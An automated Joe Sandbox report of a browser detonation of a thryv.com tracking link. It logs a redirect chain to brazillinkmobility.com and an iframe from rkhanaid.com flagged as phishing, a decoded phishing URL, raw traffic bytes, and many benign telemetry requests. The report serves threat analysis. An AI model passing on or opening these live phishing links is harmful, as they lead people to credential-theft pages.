Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWX

Overview

General Information

Sample URL:https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLu
Analysis ID:1562548
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 1216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1964,i,15332587490438412603,18326055542032576859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://0fkw.rkhanaid.com/AKlVEiS64UXEo05M_nfcas4zNiMt/Avira URL Cloud: Label: phishing
Source: http://brazillinkmobility.com/cgii/index.htmlHTTP Parser: Base64 decoded: https://ZWnWbt7jGHRmpest409c5FxyJxktzQdGu9RPqv3y86PHk2BZ8Ygd4At2y7.diblethe.com/hREMlpMWqWmtcGaqluUZUHKXgteoAtgFBIGCWSVBIWHNWKXEQSXYWGITOZRNGFAIPBQPWBAIFUTE
Source: http://brazillinkmobility.com/cgii/index.htmlHTTP Parser: No favicon
Source: http://brazillinkmobility.com/cgii/index.htmlHTTP Parser: No favicon
Source: http://brazillinkmobility.com/cgii/index.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 2.20.204.113:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.20.204.113:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: clickme.thryv.com to http://brazillinkmobility.com/cgii/index.html
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.204.113
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 16:55:37 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 25 Nov 2024 12:01:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1605Keep-Alive: timeout=5, max=75Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 92 4f 6e db 46 14 c6 f7 3a c5 54 5d 48 42 64 2a dd 05 8d a4 c2 08 d0 75 81 a6 ab a2 a8 69 71 64 31 a0 48 81 a4 ed 18 86 97 bd 47 17 3d 47 2f d3 03 f4 0a a5 e2 56 51 f8 de f7 cd 23 e5 20 69 51 20 40 a8 e7 99 37 df 9f df 7c 53 6f b3 e5 c0 cd 37 3e 4e 9a ff dd 7c eb eb d8 ad 36 71 59 f9 7a 31 fc e1 f5 b7 67 2f 86 ef ff 90 c7 5b bf 18 de a4 fe 76 57 94 f5 d0 ad 8a bc f6 79 73 f0 36 4d ea cd 22 f1 37 e9 ca 9f bd fb 31 75 69 9e d6 69 9c 9d 55 ab 38 f3 8b af a2 e7 62 51 59 5c 16 75 75 b4 26 2f d2 3c f1 6f a7 2e 2f d6 45 96 15 b7 fb 2b f3 d9 df ea e6 97 45 72 b7 ff bf da c5 b9 db a4 49 e2 f3 e5 eb 8d 77 71 59 a7 55 ed 92 b4 da 65 f1 9d 4f dc c6 97 6e 17 a7 79 9d e6 57 95 8b 6b 57 37 a7 ae e2 2c f3 e5 5d 34 9f ed ef bf 5b fc b8 70 5e ad ca 74 57 2f 07 37 71 e9 fc 76 77 5d c5 6e e1 f2 eb 2c 7b 39 48 d7 e3 ac 58 c5 75 5a e4 d1 26 ae 36 6e b1 70 c3 e1 e4 7e d0 9a ba 8b 8b 97 83 c3 dd fd 8f 07 79 f7 8b 7f 2e 1f 0e 7e f0 f7 c7 3b ee c3 4b 51 9a af b2 eb c4 57 e3 d1 37 a3 c9 c4 a1 cb 51 e9 1b f3 2b 3f 1e 7d 39 9a ba d1 68 b2 df 96 fb 5b f7 5d 59 bc bd 1b df 3f 4c ef af 7c fd f5 f8 e7 e9 fa 7c b2 58 fa 9b 38 1b ff 18 45 d1 fa fc a7 68 1b ef c6 eb f3 c5 f2 d9 78 f8 e7 ef bf 0e 97 cd 89 49 f4 a6 e9 e2 e2 e2 b0 76 16 dd bf 78 98 5d 4d f7 e7 be af cb 26 d8 68 5d 16 db 57 0d 2a af 8a c4 8f 9b bb cf 2f 87 cf f6 57 27 93 87 49 34 68 36 fd f1 cb 6f 8f ff 0e df cd 47 eb fb 30 69 9d 3f 0c e5 f7 f1 50 2e 6f cd e5 7e 79 a0 f5 ae dc 73 7c 52 fa 92 46 90 54 24 2c f8 ae ea d7 62 5f 3a 0d e6 80 fc aa 05 f1 1c d4 f3 5c 67 2b 1c ae 87 3c a7 3e 24 f7 c8 0d 16 ae 3e 61 9e 12 15 f5 ae 8a 19 ea c2 92 bf ba c7 e8 17 e9 34 1e 23 32 64 0e 28 9f 53 e6 41 1e 50 ce 6a 3e 6a 89 84 13 ce 03 ef 31 18 20 d9 23 03 91 f6 d5 87 d0 4f a3 7e a2 93 e8 09 12 d2 0f b0 60 ef 64 ae c6 2b 2d 07 39 e9 a1 13 e5 66 79 97 eb 47 bd 93 be 90 bc 20 87 a8 2f 64 c7 5e ab dc 8f 38 39 65 6e e1 c4 de a3 0a b3 1a 48 2b 04 04 0c c9 b6 13 6f f2 a2 0c 99 74 4a 78 53 2d f3 77 09 87 24 37 42 48 3f c0 82 bd 93 b9 1a af b4 cc 39 e9 ba 9f e4 dc a9 77 54 13 02 8c f4 65 cc 99 fb e5 dc 72 5f a8 77 c9 49 57 d9 72 3f e2 ed 94 b9 85 37 ce 2d e7 04 05 82 7a 41 0b 11 4e bc 77 ce a1 ea 57 2d 0b f1 80 2c f3 77 55 9d 44 4f 90 90 7e 80 05 7b 27 73 35 5e 69 19 71 12 9c ab 32 48 5f 46 5f 1c 03 a4 bf 5f bc b2 17 d4 d7 29 73 4b 5f 3c 1f b5 3b c2 a1 da 3b 2a 82 64 db 89 4f 5e 9c 6a df c8 ad 6a 99 bf ab ea 24 7a 82 84 f4 03 2c d8 3b 99 ab f1 4a cb 41 4e ec cf 91 5e 48 ec ad 85 32 3a 0b 1e c8 57 bf d8 65 5f a8 c7 53 e6 96 60 39 0f 96 3c a5 35 94 33 07 20 c8 03 d2 c9 8b 53 ed 23 c0 d4 9f 46 fd 44 27 d1 13 24 a4 1f 60 c1 de c9 5c 8d 57 5a ee c1 09 d9 2f cf b7 36 1b cf 23 2c 2d 7c 12 00 c8 1e 59 9
Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D HTTP/1.1Host: clickme.thryv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /AKlVEiS64UXEo05M_nfcas4zNiMt/ HTTP/1.1Host: 0fkw.rkhanaid.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: http://brazillinkmobility.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0fkw.rkhanaid.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0fkw.rkhanaid.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4bXW47ENZmx3mpV&MD=hoFYSZH8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4bXW47ENZmx3mpV&MD=hoFYSZH8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
